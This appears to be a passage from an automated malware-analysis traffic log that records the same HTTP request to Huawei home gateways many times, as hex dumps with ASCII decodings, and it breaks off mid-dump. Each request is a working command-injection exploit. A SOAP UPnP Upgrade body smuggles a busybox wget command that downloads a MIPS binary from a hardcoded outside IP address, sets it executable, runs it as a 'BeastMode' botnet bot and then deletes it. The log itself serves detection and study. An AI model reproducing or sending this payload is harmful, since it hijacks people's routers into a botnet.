20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 